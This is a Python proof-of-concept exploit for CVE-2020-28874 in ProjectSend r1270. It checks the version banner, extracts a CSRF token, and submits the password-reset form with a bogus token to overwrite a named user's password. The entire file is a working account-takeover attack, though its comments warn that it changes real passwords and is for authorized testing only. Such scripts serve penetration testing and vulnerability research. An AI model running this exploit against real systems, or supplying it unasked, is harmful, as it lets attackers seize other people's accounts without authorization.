import requests
import argparse
import re

# Default proxy table: both schemes unset, so requests goes direct.
# main() overwrites this when --proxy is supplied.
proxies = dict(http=None, https=None)


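def check():
    """Fingerprint the target and return the session used to talk to it.

    Looks for the string ``version r1270`` in the landing page. This is a
    banner check only: a missing banner prints a warning but does not stop
    the run, and a matching banner is not proof that the reset flaw is
    present on this install.

    Returns:
        The requests.Session that fetched the page; exploit() reuses it.
    """
    session = requests.Session()
    # verify=False disables TLS certificate validation. That is usual for
    # PoC tooling aimed at self-signed lab hosts, but it also means the
    # password you send can be intercepted on an untrusted network.
    r = session.get(url, proxies=proxies, verify=False)
    # Membership test rather than find() > 0, which would miss a banner
    # sitting at offset 0 of the body.
    if "version r1270" in r.text:
        print("The application is vulnerable")
    else:
        print("The application may not be vulnerable")

    return session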

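def getCSRFtoken(session):
    """Fetch the landing page and extract the hidden ``csrf_token`` field.

    Args:
        session: requests.Session to fetch with. Presumably the token is
            bound to that session's cookies, so the same session must be
            used for the POST that consumes it — confirm against the app.

    Returns:
        The token string captured from the ``value`` attribute.

    Raises:
        ValueError: when no ``csrf_token`` input is present in the page
            (e.g. wrong URL, different version, or a proxy error page),
            instead of the bare AttributeError a None match would raise.
    """
    r = session.get(url, proxies=proxies, verify=False)
    # Pattern kept identical to the original; it targets ProjectSend's exact
    # markup (spaces before ``name``, ``value`` directly after it).
    m = re.search(r' +name="csrf_token" value="(.*?)"', r.text)
    if m is None:
        raise ValueError("csrf_token not found in response from {}".format(url))
    return m.group(1)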

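def exploit(session):
    """Submit the ``new_password`` reset form for *user* with a bogus token.

    The request carries ``token=NotValid``; on a vulnerable build the server
    accepts the form anyway and sets *pwd* as the account's password. This
    is a destructive action against the target account (its existing
    password is replaced) — run it only with authorization.

    Args:
        session: requests.Session, normally the one returned by check().

    Returns:
        True when the server's success banner appears in the response,
        False otherwise. Callers that ignore the return value are unaffected.
    """
    # Let requests build the query string so a username containing '&',
    # '%', '#' or whitespace cannot break or truncate the request.
    target = url + "/reset-password.php"
    params = {"user": user, "token": "NotValid"}
    csrf_token = getCSRFtoken(session)
    data = {"csrf_token": csrf_token, "form_type": "new_password", "password": pwd}
    # verify=False: same trade-off as in check() — lab-friendly, not safe on
    # an untrusted network.
    r = session.post(target, params=params, data=data, proxies=proxies, verify=False)

    success = "Your new password has been set. You can now log in using it." in r.text
    print("Success!!" if success else "Fail!!!")
    return success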

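def main():
    """Parse arguments, validate the target URL, then run check() and exploit().

    Inputs are handed to the other functions through the module globals
    ``url``, ``user``, ``pwd`` and ``proxies`` because they read those
    names directly.

    Operator caveats: the new password is given on the command line, so it
    lands in shell history and process listings; and the target account's
    password is actually changed. Use only against systems you are
    authorized to test.
    """
    parser = argparse.ArgumentParser(description='CVE-2020-28874: ProjectSend r1270 Privilege Escalation')
    parser.add_argument('--url',type=str,help='The url address of the ProjectSend app',required=True)
    parser.add_argument('--user',type=str,help='The user name target of the app',required=True)
    parser.add_argument('--pwd',type=str,help='The new password to set',required=True)
    parser.add_argument('--proxy',type=str,help="The proxy to be use in format IP:PORT By default None",required=False)

    args = parser.parse_args()
    global url
    global user
    global pwd
    global proxies

    url = args.url
    user = args.user
    pwd = args.pwd

    if args.proxy is not None:
        # Intercepting proxies (Burp, mitmproxy) listen on plain HTTP even
        # when the target is HTTPS, so both entries use the http:// scheme.
        # An https://IP:PORT value would make requests try to speak TLS to
        # the proxy itself, which such proxies do not offer by default.
        proxy_url = "http://{}".format(args.proxy)
        proxies = {"http": proxy_url, "https": proxy_url}

    # Loose sanity check on the URL shape; pattern unchanged from the original.
    regex = re.compile(
        r'^(?:http)s?://' # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
        r'localhost|' #localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
        r'(?::\d+)?' # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    if (re.match(regex, url) is None):
        print("The provided url is not valid!")
        # Non-zero exit so a wrapper script can tell validation failure apart
        # from a normal run; exit() is the site-module helper, not the builtin.
        raise SystemExit(1)

    # exploit() appends "/reset-password.php"; strip a trailing slash so a
    # URL given as "https://host/" does not produce "//reset-password.php".
    url = url.rstrip("/")

    session = check()
    exploit(session)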

# Script entry point; importing the module defines the functions without
# running anything.
if __name__ == "__main__":
    main()